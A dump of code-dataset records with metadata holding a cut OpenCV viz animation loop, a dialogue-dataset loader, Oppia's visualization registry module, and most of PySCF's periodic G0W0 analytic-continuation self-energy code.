rot_vec = np.zeros(shape=(1,3),dtype=np.float32)
while not my_window.wasStopped():
rot_vec[0, 0] += np.pi * 0.01
rot_vec[0, 1] += np.pi * 0.01
rot_vec[0, 2] += np.pi * 0.01
translation_phase += pi * 0.01
translation = np.sin(translation_phase)
pose = cv.viz_Affine3d(rot_vec, (translation, translation, translation))
my_window.setWidgetPose("Cube Widget",pose)
my_window.spinOnce(1, True);
print("Last event loop is over")
|
en
| 0.260315
|
#my_window.showWidget("plan", plan)
| 2.361356
| 2
|
data/loader.py
|
jkulhanek/soloist
| 3
|
6628088
|
import os
import functools
import logging
from data.utils import ConcatDialogDataset, split_name, wrap_dataset_with_blacklist
RESTRICTED_DOMAINS = ['hotel', 'train', 'restaurant', 'attraction', 'taxi',
'hospital', 'police', 'rentalcar', 'flight', 'hotels',
'restaurant-search', 'flights']
DATASETS_PATH = os.path.join(os.path.expanduser(os.environ.get('DATASETS_PATH', '~/datasets')), 'soloist')
logger = logging.getLogger()
def load_dataset(name, restrict_domains=False, augment='disabled', use_blacklist=False, **kwargs):
if restrict_domains:
return load_dataset(name, domains=RESTRICTED_DOMAINS, **kwargs)
if '+' in name:
# This is a concat dataset
datasets = name.split('+')
_load_dataset = functools.partial(load_dataset, **kwargs)
datasets = list(map(_load_dataset, datasets))
return ConcatDialogDataset(datasets)
dataset_name, split = split_name(name)
from data.dataset import load_dataset as load_custom_dataset
dataset = load_custom_dataset(name, **kwargs)
if use_blacklist:
dataset = add_blacklist(dataset, name)
return dataset
def add_blacklist(dataset, name):
dataset_name, split = split_name(name)
with open(os.path.join(DATASETS_PATH, dataset_name, f'{split}-blacklist.txt'), 'r') as f:
blacklist = sorted(set(int(x.rstrip()) for x in f))
logging.warning(f'Some examples ({100 * len(blacklist) / len(dataset):.2f}%) were ignored by a blacklist.')
return wrap_dataset_with_blacklist(dataset, blacklist)
def load_backtranslation_transformation(name):
import data.backtranslation
def get_backtranslation_datasets(name):
if '+' in name:
datasets = name.split('+')
return sum(map(get_backtranslation_datasets, datasets), [])
if name.endswith('.yaml'):
return [name]
new_name, split = split_name(name)
if split in {'dev', 'val', 'train', 'test', 'validation', 'training', 'testing', 'development'}:
name = new_name
if name == 'multiwoz-2.0':
# NOTE: we do not have backtranslations for MultiWOZ 2.0
return ['multiwoz-2.1']
return [name]
backtranslation_dict = data.backtranslation.load_backtranslations(list(set(get_backtranslation_datasets(name))))
return data.backtranslation.BackTranslateAugmentation(backtranslation_dict)
|
import os
import functools
import logging
from data.utils import ConcatDialogDataset, split_name, wrap_dataset_with_blacklist
RESTRICTED_DOMAINS = ['hotel', 'train', 'restaurant', 'attraction', 'taxi',
'hospital', 'police', 'rentalcar', 'flight', 'hotels',
'restaurant-search', 'flights']
DATASETS_PATH = os.path.join(os.path.expanduser(os.environ.get('DATASETS_PATH', '~/datasets')), 'soloist')
logger = logging.getLogger()
def load_dataset(name, restrict_domains=False, augment='disabled', use_blacklist=False, **kwargs):
if restrict_domains:
return load_dataset(name, domains=RESTRICTED_DOMAINS, **kwargs)
if '+' in name:
# This is a concat dataset
datasets = name.split('+')
_load_dataset = functools.partial(load_dataset, **kwargs)
datasets = list(map(_load_dataset, datasets))
return ConcatDialogDataset(datasets)
dataset_name, split = split_name(name)
from data.dataset import load_dataset as load_custom_dataset
dataset = load_custom_dataset(name, **kwargs)
if use_blacklist:
dataset = add_blacklist(dataset, name)
return dataset
def add_blacklist(dataset, name):
dataset_name, split = split_name(name)
with open(os.path.join(DATASETS_PATH, dataset_name, f'{split}-blacklist.txt'), 'r') as f:
blacklist = sorted(set(int(x.rstrip()) for x in f))
logging.warning(f'Some examples ({100 * len(blacklist) / len(dataset):.2f}%) were ignored by a blacklist.')
return wrap_dataset_with_blacklist(dataset, blacklist)
def load_backtranslation_transformation(name):
import data.backtranslation
def get_backtranslation_datasets(name):
if '+' in name:
datasets = name.split('+')
return sum(map(get_backtranslation_datasets, datasets), [])
if name.endswith('.yaml'):
return [name]
new_name, split = split_name(name)
if split in {'dev', 'val', 'train', 'test', 'validation', 'training', 'testing', 'development'}:
name = new_name
if name == 'multiwoz-2.0':
# NOTE: we do not have backtranslations for MultiWOZ 2.0
return ['multiwoz-2.1']
return [name]
backtranslation_dict = data.backtranslation.load_backtranslations(list(set(get_backtranslation_datasets(name))))
return data.backtranslation.BackTranslateAugmentation(backtranslation_dict)
|
en
| 0.743111
|
# This is a concat dataset # NOTE: we do not have backtranslations for MultiWOZ 2.0
| 2.365214
| 2
|
core/domain/visualization_registry.py
|
aadilmehdis/oppia
| 1
|
6628089
|
<filename>core/domain/visualization_registry.py
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Registry for visualizations."""
import inspect
import os
from extensions.visualizations import models
import feconf
import utils
class Registry(object):
"""Registry of all visualizations."""
# Dict mapping visualization class names to their classes.
visualizations_dict = {}
@classmethod
def _refresh_registry(cls):
cls.visualizations_dict.clear()
# Add new visualization instances to the registry.
for name, clazz in inspect.getmembers(models, inspect.isclass):
if name.endswith('_test') or name == 'BaseVisualization':
continue
ancestor_names = [
base_class.__name__ for base_class in inspect.getmro(clazz)]
if 'BaseVisualization' not in ancestor_names:
continue
cls.visualizations_dict[clazz.__name__] = clazz
@classmethod
def get_full_html(cls):
"""Returns the HTML bodies for all visualizations."""
js_directives = utils.get_file_contents(os.path.join(
feconf.VISUALIZATIONS_DIR, 'visualizations.js'))
return '<script>%s</script>\n' % (js_directives)
@classmethod
def get_visualization_class(cls, visualization_id):
"""Gets a visualization class by its id (which is also its class name).
The registry will refresh if the desired class is not found. If it's
still not found after the refresh, this method will throw an error.
"""
if visualization_id not in cls.visualizations_dict:
cls._refresh_registry()
if visualization_id not in cls.visualizations_dict:
raise TypeError(
'\'%s\' is not a valid visualization id.' % visualization_id)
return cls.visualizations_dict[visualization_id]
@classmethod
def get_all_visualization_ids(cls):
"""Gets a visualization class by its id
(which is also its class name).
"""
if not cls.visualizations_dict:
cls._refresh_registry()
return cls.visualizations_dict.keys()
|
<filename>core/domain/visualization_registry.py
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Registry for visualizations."""
import inspect
import os
from extensions.visualizations import models
import feconf
import utils
class Registry(object):
"""Registry of all visualizations."""
# Dict mapping visualization class names to their classes.
visualizations_dict = {}
@classmethod
def _refresh_registry(cls):
cls.visualizations_dict.clear()
# Add new visualization instances to the registry.
for name, clazz in inspect.getmembers(models, inspect.isclass):
if name.endswith('_test') or name == 'BaseVisualization':
continue
ancestor_names = [
base_class.__name__ for base_class in inspect.getmro(clazz)]
if 'BaseVisualization' not in ancestor_names:
continue
cls.visualizations_dict[clazz.__name__] = clazz
@classmethod
def get_full_html(cls):
"""Returns the HTML bodies for all visualizations."""
js_directives = utils.get_file_contents(os.path.join(
feconf.VISUALIZATIONS_DIR, 'visualizations.js'))
return '<script>%s</script>\n' % (js_directives)
@classmethod
def get_visualization_class(cls, visualization_id):
"""Gets a visualization class by its id (which is also its class name).
The registry will refresh if the desired class is not found. If it's
still not found after the refresh, this method will throw an error.
"""
if visualization_id not in cls.visualizations_dict:
cls._refresh_registry()
if visualization_id not in cls.visualizations_dict:
raise TypeError(
'\'%s\' is not a valid visualization id.' % visualization_id)
return cls.visualizations_dict[visualization_id]
@classmethod
def get_all_visualization_ids(cls):
"""Gets a visualization class by its id
(which is also its class name).
"""
if not cls.visualizations_dict:
cls._refresh_registry()
return cls.visualizations_dict.keys()
|
en
| 0.898718
|
# coding: utf-8 # # Copyright 2014 The Oppia Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Registry for visualizations. Registry of all visualizations. # Dict mapping visualization class names to their classes. # Add new visualization instances to the registry. Returns the HTML bodies for all visualizations. Gets a visualization class by its id (which is also its class name). The registry will refresh if the desired class is not found. If it's still not found after the refresh, this method will throw an error. Gets a visualization class by its id (which is also its class name).
| 1.943548
| 2
|
pyscf/pbc/gw/krgw_ac.py
|
mfkasim1/pyscf
| 1
|
6628090
|
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
'''
PBC spin-restricted G0W0-AC QP eigenvalues with k-point sampling
This implementation has N^4 scaling, and is faster than GW-CD (N^4)
and analytic GW (N^6) methods.
GW-AC is recommended for valence states only, and is inaccuarate for core states.
Method:
See <NAME> and <NAME>, arxiv:2007.03148 (2020) for details
Compute Sigma on imaginary frequency with density fitting,
then analytically continued to real frequency.
Gaussian density fitting must be used (FFTDF and MDF are not supported).
'''
from functools import reduce
import time
import numpy
import numpy as np
import h5py
from scipy.optimize import newton, least_squares
from pyscf import lib
from pyscf.lib import logger
from pyscf.ao2mo import _ao2mo
from pyscf.ao2mo.incore import _conc_mos
from pyscf.pbc import df, dft, scf
from pyscf.pbc.mp.kmp2 import get_nocc, get_nmo, get_frozen_mask
from pyscf import __config__
einsum = lib.einsum
def kernel(gw, mo_energy, mo_coeff, orbs=None,
kptlist=None, nw=None, verbose=logger.NOTE):
'''GW-corrected quasiparticle orbital energies
Returns:
A list : converged, mo_energy, mo_coeff
'''
mf = gw._scf
if gw.frozen is None:
frozen = 0
else:
frozen = gw.frozen
assert (frozen == 0)
if orbs is None:
orbs = range(gw.nmo)
if kptlist is None:
kptlist = range(gw.nkpts)
nkpts = gw.nkpts
nklist = len(kptlist)
norbs = len(orbs)
# v_xc
dm = np.array(mf.make_rdm1())
v_mf = np.array(mf.get_veff()) - np.array(mf.get_j(dm_kpts=dm))
for k in range(nkpts):
v_mf[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), v_mf[k], mo_coeff[k]))
nocc = gw.nocc
nmo = gw.nmo
nvir = nmo-nocc
# v_hf from DFT/HF density
if gw.fc:
exxdiv = 'ewald'
else:
exxdiv = None
rhf = scf.KRHF(gw.mol, gw.kpts, exxdiv=exxdiv)
rhf.with_df = gw.with_df
if getattr(gw.with_df, '_cderi', None) is None:
raise RuntimeError('Found incompatible integral scheme %s.'
'KGWAC can be only used with GDF integrals' %
gw.with_df.__class__)
vk = rhf.get_veff(gw.mol,dm_kpts=dm) - rhf.get_j(gw.mol,dm_kpts=dm)
for k in range(nkpts):
vk[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), vk[k], mo_coeff[k]))
# Grids for integration on imaginary axis
freqs,wts = _get_scaled_legendre_roots(nw)
# Compute self-energy on imaginary axis i*[0,iw_cutoff]
sigmaI, omega = get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=5.)
# Analytic continuation
coeff = []
if gw.ac == 'twopole':
for k in range(nklist):
coeff.append(AC_twopole_diag(sigmaI[k], omega, orbs, nocc))
elif gw.ac == 'pade':
for k in range(nklist):
coeff_tmp, omega_fit = AC_pade_thiele_diag(sigmaI[k], omega)
coeff.append(coeff_tmp)
coeff = np.array(coeff)
conv = True
# This code does not support metals
homo = -99.; lumo = 99.
for k in range(nkpts):
if homo < mf.mo_energy[k][nocc-1]:
homo = mf.mo_energy[k][nocc-1]
if lumo > mf.mo_energy[k][nocc]:
lumo = mf.mo_energy[k][nocc]
ef = (homo+lumo)/2.
mo_energy = np.zeros_like(np.array(mf.mo_energy))
for k in range(nklist):
kn = kptlist[k]
for p in orbs:
if gw.linearized:
# linearized G0W0
de = 1e-6
ep = mf.mo_energy[kn][p]
#TODO: analytic sigma derivative
if gw.ac == 'twopole':
sigmaR = two_pole(ep-ef, coeff[k,:,p-orbs[0]]).real
dsigma = two_pole(ep-ef+de, coeff[k,:,p-orbs[0]]).real - sigmaR.real
elif gw.ac == 'pade':
sigmaR = pade_thiele(ep-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
dsigma = pade_thiele(ep-ef+de, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real - sigmaR.real
zn = 1.0/(1.0-dsigma/de)
e = ep + zn*(sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
mo_energy[kn,p] = e
else:
# self-consistently solve QP equation
def quasiparticle(omega):
if gw.ac == 'twopole':
sigmaR = two_pole(omega-ef, coeff[k,:,p-orbs[0]]).real
elif gw.ac == 'pade':
sigmaR = pade_thiele(omega-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
return omega - mf.mo_energy[kn][p] - (sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
try:
e = newton(quasiparticle, mf.mo_energy[kn][p], tol=1e-6, maxiter=100)
mo_energy[kn,p] = e
except RuntimeError:
conv = False
mo_coeff = mf.mo_coeff
if gw.verbose >= logger.DEBUG:
numpy.set_printoptions(threshold=nmo)
for k in range(nkpts):
logger.debug(gw, ' GW mo_energy @ k%d =\n%s', k,mo_energy[k])
numpy.set_printoptions(threshold=1000)
return conv, mo_energy, mo_coeff
def get_rho_response(gw, omega, mo_energy, Lpq, kL, kidx):
'''
Compute density response function in auxiliary basis at freq iw
'''
nkpts, naux, nmo, nmo = Lpq.shape
nocc = gw.nocc
kpts = gw.kpts
kscaled = gw.mol.get_scaled_kpts(kpts)
kscaled -= kscaled[0]
# Compute Pi for kL
Pi = np.zeros((naux,naux),dtype=np.complex128)
for i, kpti in enumerate(kpts):
# Find ka that conserves with ki and kL (-ki+ka+kL=G)
a = kidx[i]
eia = mo_energy[i,:nocc,None] - mo_energy[a,None,nocc:]
eia = eia/(omega**2+eia*eia)
Pia = einsum('Pia,ia->Pia',Lpq[i][:,:nocc,nocc:],eia)
# Response from both spin-up and spin-down density
Pi += 4./nkpts * einsum('Pia,Qia->PQ',Pia,Lpq[i][:,:nocc,nocc:].conj())
return Pi
def get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=None, max_memory=8000):
'''
Compute GW correlation self-energy (diagonal elements)
in MO basis on imaginary axis
'''
mo_energy = np.array(gw._scf.mo_energy)
mo_coeff = np.array(gw._scf.mo_coeff)
nocc = gw.nocc
nmo = gw.nmo
nkpts = gw.nkpts
kpts = gw.kpts
nklist = len(kptlist)
nw = len(freqs)
norbs = len(orbs)
mydf = gw.with_df
# possible kpts shift center
kscaled = gw.mol.get_scaled_kpts(kpts)
kscaled -= kscaled[0]
# This code does not support metals
homo = -99.; lumo = 99.
for k in range(nkpts):
if homo < mo_energy[k][nocc-1]:
homo = mo_energy[k][nocc-1]
if lumo > mo_energy[k][nocc]:
lumo = mo_energy[k][nocc]
if (lumo-homo)<1e-3:
logger.warn(gw, 'This GW-AC code is not supporting metals!')
ef = (homo+lumo)/2.
# Integration on numerical grids
if iw_cutoff is not None:
nw_sigma = sum(iw < iw_cutoff for iw in freqs) + 1
else:
nw_sigma = nw + 1
# Compute occ for -iw and vir for iw separately
# to avoid branch cuts in analytic continuation
omega_occ = np.zeros((nw_sigma),dtype=np.complex128)
omega_vir = np.zeros((nw_sigma),dtype=np.complex128)
omega_occ[0] = 1j*0.; omega_occ[1:] = -1j*freqs[:(nw_sigma-1)]
omega_vir[0] = 1j*0.; omega_vir[1:] = 1j*freqs[:(nw_sigma-1)]
orbs_occ = [i for i in orbs if i < nocc]
norbs_occ = len(orbs_occ)
emo_occ = np.zeros((nkpts,nmo,nw_sigma),dtype=np.complex128)
emo_vir = np.zeros((nkpts,nmo,nw_sigma),dtype=np.complex128)
for k in range(nkpts):
emo_occ[k] = omega_occ[None,:] + ef - mo_energy[k][:,None]
emo_vir[k] = omega_vir[None,:] + ef - mo_energy[k][:,None]
sigma = np.zeros((nklist,norbs,nw_sigma),dtype=np.complex128)
omega = np.zeros((norbs,nw_sigma),dtype=np.complex128)
for p in range(norbs):
orbp = orbs[p]
if orbp < nocc:
omega[p] = omega_occ.copy()
else:
omega[p] = omega_vir.copy()
if gw.fc:
# Set up q mesh for q->0 finite size correction
q_pts = np.array([1e-3,0,0]).reshape(1,3)
nq_pts = len(q_pts)
q_abs = gw.mol.get_abs_kpts(q_pts)
# Get qij = 1/sqrt(Omega) * < psi_{ik} | e^{iqr} | psi_{ak-q} > at q: (nkpts, nocc, nvir)
qij = get_qij(gw, q_abs[0], mo_coeff)
for kL in range(nkpts):
# Lij: (ki, L, i, j) for looping every kL
Lij = []
# kidx: save kj that conserves with kL and ki (-ki+kj+kL=G)
# kidx_r: save ki that conserves with kL and kj (-ki+kj+kL=G)
kidx = np.zeros((nkpts),dtype=np.int64)
kidx_r = np.zeros((nkpts),dtype=np.int64)
for i, kpti in enumerate(kpts):
for j, kptj in enumerate(kpts):
# Find (ki,kj) that satisfies momentum conservation with kL
kconserv = -kscaled[i] + kscaled[j] + kscaled[kL]
is_kconserv = np.linalg.norm(np.round(kconserv) - kconserv) < 1e-12
if is_kconserv:
kidx[i] = j
kidx_r[j] = i
logger.debug(gw, "Read Lpq (kL: %s / %s, ki: %s, kj: %s)"%(kL+1, nkpts, i, j))
Lij_out = None
# Read (L|pq) and ao2mo transform to (L|ij)
Lpq = []
for LpqR, LpqI, sign in mydf.sr_loop([kpti, kptj], max_memory=0.1*gw._scf.max_memory, compact=False):
Lpq.append(LpqR+LpqI*1.0j)
# support uneqaul naux on different k points
Lpq = np.vstack(Lpq).reshape(-1,nmo**2)
tao = []
ao_loc = None
moij, ijslice = _conc_mos(mo_coeff[i], mo_coeff[j])[2:]
Lij_out = _ao2mo.r_e2(Lpq, moij, ijslice, tao, ao_loc, out=Lij_out)
Lij.append(Lij_out.reshape(-1,nmo,nmo))
Lij = np.asarray(Lij)
naux = Lij.shape[1]
if kL == 0:
for w in range(nw):
# body dielectric matrix eps_body
Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
eps_body_inv = np.linalg.inv(np.eye(naux)-Pi)
if gw.fc:
# head dielectric matrix eps_00
Pi_00 = get_rho_response_head(gw, freqs[w], mo_energy, qij)
eps_00 = 1. - 4. * np.pi/np.linalg.norm(q_abs[0])**2 * Pi_00
# wings dielectric matrix eps_P0
Pi_P0 = get_rho_response_wing(gw, freqs[w], mo_energy, Lij, qij)
eps_P0 = -np.sqrt(4.*np.pi) / np.linalg.norm(q_abs[0]) * Pi_P0
# inverse dielectric matrix
eps_inv_00 = 1./(eps_00 - np.dot(np.dot(eps_P0.conj(),eps_body_inv),eps_P0))
eps_inv_P0 = -eps_inv_00 * np.dot(eps_body_inv, eps_P0)
# head correction
Del_00 = 2./np.pi * (6.*np.pi**2/gw.mol.vol/nkpts)**(1./3.) * (eps_inv_00 - 1.)
eps_inv_PQ = eps_body_inv
g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
for k in range(nklist):
kn = kptlist[k]
# Find km that conserves with kn and kL (-km+kn+kL=G)
km = kidx_r[kn]
Qmn = einsum('Pmn,PQ->Qmn',Lij[km][:,:,orbs].conj(),eps_inv_PQ-np.eye(naux))
Wmn = 1./nkpts * einsum('Qmn,Qmn->mn',Qmn,Lij[km][:,:,orbs])
sigma[k][:norbs_occ] += -einsum('mn,mw->nw',Wmn[:,:norbs_occ],g0_occ[km])/np.pi
sigma[k][norbs_occ:] += -einsum('mn,mw->nw',Wmn[:,norbs_occ:],g0_vir[km])/np.pi
if gw.fc:
# apply head correction
assert(kn == km)
sigma[k][:norbs_occ] += -Del_00 * g0_occ[kn][orbs][:norbs_occ] /np.pi
sigma[k][norbs_occ:] += -Del_00 * g0_vir[kn][orbs][norbs_occ:] /np.pi
# apply wing correction
Wn_P0 = einsum('Pnm,P->nm',Lij[kn],eps_inv_P0).diagonal()
Wn_P0 = Wn_P0.real * 2.
Del_P0 = np.sqrt(gw.mol.vol/4./np.pi**3) * (6.*np.pi**2/gw.mol.vol/nkpts)**(2./3.) * Wn_P0[orbs]
sigma[k][:norbs_occ] += -einsum('n,nw->nw',Del_P0[:norbs_occ],g0_occ[kn][orbs][:norbs_occ]) /np.pi
sigma[k][norbs_occ:] += -einsum('n,nw->nw',Del_P0[norbs_occ:],g0_vir[kn][orbs][norbs_occ:]) /np.pi
else:
for w in range(nw):
Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
Pi_inv = np.linalg.inv(np.eye(naux)-Pi)-np.eye(naux)
g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
for k in range(nklist):
kn = kptlist[k]
# Find km that conserves with kn and kL (-km+kn+kL=G)
km = kidx_r[kn]
Qmn = einsum('Pmn,PQ->Qmn',Lij[km][:,:,orbs].conj(),Pi_inv)
Wmn = 1./nkpts * einsum('Qmn,Qmn->mn',Qmn,Lij[km][:,:,orbs])
sigma[k][:norbs_occ] += -einsum('mn,mw->nw',Wmn[:,:norbs_occ],g0_occ[km])/np.pi
sigma[k][norbs_occ:] += -einsum('mn,mw->nw',Wmn[:,norbs_occ:],g0_vir[km])/np.pi
return sigma, omega
def get_rho_response_head(gw, omega, mo_energy, qij):
'''
Compute head (G=0, G'=0) density response function in auxiliary basis at freq iw
'''
nkpts, nocc, nvir = qij.shape
nocc = gw.nocc
kpts = gw.kpts
# Compute Pi head
Pi_00 = 0j
for i, kpti in enumerate(kpts):
eia = mo_energy[i,:nocc,None] - mo_energy[i,None,nocc:]
eia = eia/(omega**2+eia*eia)
Pi_00 += 4./nkpts * einsum('ia,ia->',eia,qij[i].conj()*qij[i])
return Pi_00
def get_rho_response_wing(gw, omega, mo_energy, Lpq, qij):
'''
Compute wing (G=P, G'=0) density response function in auxiliary basis at freq iw
'''
nkpts, naux, nmo, nmo = Lpq.shape
nocc = gw.nocc
kpts = gw.kpts
# Compute Pi wing
Pi = np.zeros(naux,dtype=np.complex128)
for i, kpti in enumerate(kpts):
eia = mo_energy[i,:nocc,None] - mo_energy[i,None,nocc:]
eia = eia/(omega**2+eia*eia)
eia_q = eia * qij[i].conj()
Pi += 4./nkpts * einsum('Pia,ia->P',Lpq[i][:,:nocc,nocc:],eia_q)
return Pi
def get_qij(gw, q, mo_coeff, uniform_grids=False):
'''
Compute qij = 1/Omega * |< psi_{ik} | e^{iqr} | psi_{ak-q} >|^2 at q: (nkpts, nocc, nvir)
through kp perturbtation theory
Ref: Phys. Rev. B 83, 245122 (2011)
'''
nocc = gw.nocc
nmo = gw.nmo
nvir = nmo - nocc
kpts = gw.kpts
nkpts = len(kpts)
cell = gw.mol
mo_energy = gw._scf.mo_energy
if uniform_grids:
mydf = df.FFTDF(cell, kpts=kpts)
coords = cell.gen_uniform_grids(mydf.mesh)
else:
coords, weights = dft.gen_grid.get_becke_grids(cell,level=5)
ngrid = len(coords)
qij = np.zeros((nkpts,nocc,nvir),dtype=np.complex128)
for i, kpti in enumerate(kpts):
ao_p = dft.numint.eval_ao(cell, coords, kpt=kpti, deriv=1)
ao = ao_p[0]
ao_grad = ao_p[1:4]
if uniform_grids:
ao_ao_grad = einsum('mg,xgn->xmn',ao.T.conj(),ao_grad) * cell.vol / ngrid
else:
ao_ao_grad = einsum('g,mg,xgn->xmn',weights,ao.T.conj(),ao_grad)
q_ao_ao_grad = -1j * einsum('x,xmn->mn',q,ao_ao_grad)
q_mo_mo_grad = np.dot(np.dot(mo_coeff[i][:,:nocc].T.conj(), q_ao_ao_grad), mo_coeff[i][:,nocc:])
enm = 1./(mo_energy[i][nocc:,None] - mo_energy[i][None,:nocc])
dens = enm.T * q_mo_mo_grad
qij[i] = dens / np.sqrt(cell.vol)
return qij
def _get_scaled_legendre_roots(nw):
"""
Scale nw Legendre roots, which lie in the
interval [-1, 1], so that they lie in [0, inf)
Ref: www.cond-mat.de/events/correl19/manuscripts/ren.pdf
Returns:
freqs : 1D ndarray
wts : 1D ndarray
"""
freqs, wts = np.polynomial.legendre.leggauss(nw)
x0 = 0.5
freqs_new = x0*(1.+freqs)/(1.-freqs)
wts = wts*2.*x0/(1.-freqs)**2
return freqs_new, wts
def _get_clenshaw_curtis_roots(nw):
"""
Clenshaw-Curtis qaudrature on [0,inf)
Ref: J. Chem. Phys. 132, 234114 (2010)
Returns:
freqs : 1D ndarray
wts : 1D ndarray
"""
freqs = np.zeros(nw)
wts = np.zeros(nw)
a = 0.2
for w in range(nw):
t = (w+1.0)/nw * np.pi/2.
freqs[w] = a / np.tan(t)
if w != nw-1:
wts[w] = a*np.pi/2./nw/(np.sin(t)**2)
else:
wts[w] = a*np.pi/4./nw/(np.sin(t)**2)
return freqs[::-1], wts[::-1]
def two_pole_fit(coeff, omega, sigma):
cf = coeff[:5] + 1j*coeff[5:]
f = cf[0] + cf[1]/(omega+cf[3]) + cf[2]/(omega+cf[4]) - sigma
f[0] = f[0]/0.01
return np.array([f.real,f.imag]).reshape(-1)
def two_pole(freqs, coeff):
cf = coeff[:5] + 1j*coeff[5:]
return cf[0] + cf[1]/(freqs+cf[3]) + cf[2]/(freqs+cf[4])
def AC_twopole_diag(sigma, omega, orbs, nocc):
"""
Analytic continuation to real axis using a two-pole model
Returns:
coeff: 2D array (ncoeff, norbs)
"""
norbs, nw = sigma.shape
coeff = np.zeros((10,norbs))
for p in range(norbs):
target = np.array([sigma[p].real,sigma[p].imag]).reshape(-1)
if orbs[p] < nocc:
x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, -1.0, -0.5])
else:
x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, 1.0, 0.5])
#TODO: analytic gradient
xopt = least_squares(two_pole_fit, x0, jac='3-point', method='trf', xtol=1e-10,
gtol = 1e-10, max_nfev=1000, verbose=0, args=(omega[p], sigma[p]))
if xopt.success is False:
print('WARN: 2P-Fit Orb %d not converged, cost function %e'%(p,xopt.cost))
coeff[:,p] = xopt.x.copy()
return coeff
def thiele(fn,zn):
nfit = len(zn)
g = np.zeros((nfit,nfit),dtype=np.complex128)
g[:,0] = fn.copy()
for i in range(1,nfit):
g[i:,i] = (g[i-1,i-1]-g[i:,i-1])/((zn[i:]-zn[i-1])*g[i:,i-1])
a = g.diagonal()
return a
def pade_thiele(freqs,zn,coeff):
nfit = len(coeff)
X = coeff[-1]*(freqs-zn[-2])
for i in range(nfit-1):
idx = nfit-i-1
X = coeff[idx]*(freqs-zn[idx-1])/(1.+X)
X = coeff[0]/(1.+X)
return X
def AC_pade_thiele_diag(sigma, omega):
"""
Analytic continuation to real axis using a Pade approximation
from Thiele's reciprocal difference method
Reference: <NAME>. Phys. 29, 179 (1977)
Returns:
coeff: 2D array (ncoeff, norbs)
omega: 2D array (norbs, npade)
"""
idx = range(1,40,6)
sigma1 = sigma[:,idx].copy()
sigma2 = sigma[:,(idx[-1]+4)::4].copy()
sigma = np.hstack((sigma1,sigma2))
omega1 = omega[:,idx].copy()
omega2 = omega[:,(idx[-1]+4)::4].copy()
omega = np.hstack((omega1,omega2))
norbs, nw = sigma.shape
npade = nw // 2
coeff = np.zeros((npade*2,norbs),dtype=np.complex128)
for p in range(norbs):
coeff[:,p] = thiele(sigma[p,:npade*2], omega[p,:npade*2])
return coeff, omega[:,:npade*2]
class KRGWAC(lib.StreamObject):
linearized = getattr(__config__, 'gw_gw_GW_linearized', False)
# Analytic continuation: pade or twopole
ac = getattr(__config__, 'gw_gw_GW_ac', 'pade')
# Whether applying finite size corrections
fc = getattr(__config__, 'gw_gw_GW_fc', True)
def __init__(self, mf, frozen=0):
self.mol = mf.mol
self._scf = mf
self.verbose = self.mol.verbose
self.stdout = self.mol.stdout
self.max_memory = mf.max_memory
#TODO: implement frozen orbs
if frozen > 0:
raise NotImplementedError
self.frozen = frozen
# DF-KGW must use GDF integrals
if getattr(mf, 'with_df', None):
self.with_df = mf.with_df
else:
raise NotImplementedError
self._keys.update(['with_df'])
##################################################
# don't modify the following attributes, they are not input options
self._nocc = None
self._nmo = None
self.kpts = mf.kpts
self.nkpts = len(self.kpts)
# self.mo_energy: GW quasiparticle energy, not scf mo_energy
self.mo_energy = None
self.mo_coeff = mf.mo_coeff
self.mo_occ = mf.mo_occ
self.sigma = None
keys = set(('linearized','ac','fc'))
self._keys = set(self.__dict__.keys()).union(keys)
def dump_flags(self):
log = logger.Logger(self.stdout, self.verbose)
log.info('')
log.info('******** %s ********', self.__class__)
log.info('method = %s', self.__class__.__name__)
nocc = self.nocc
nvir = self.nmo - nocc
nkpts = self.nkpts
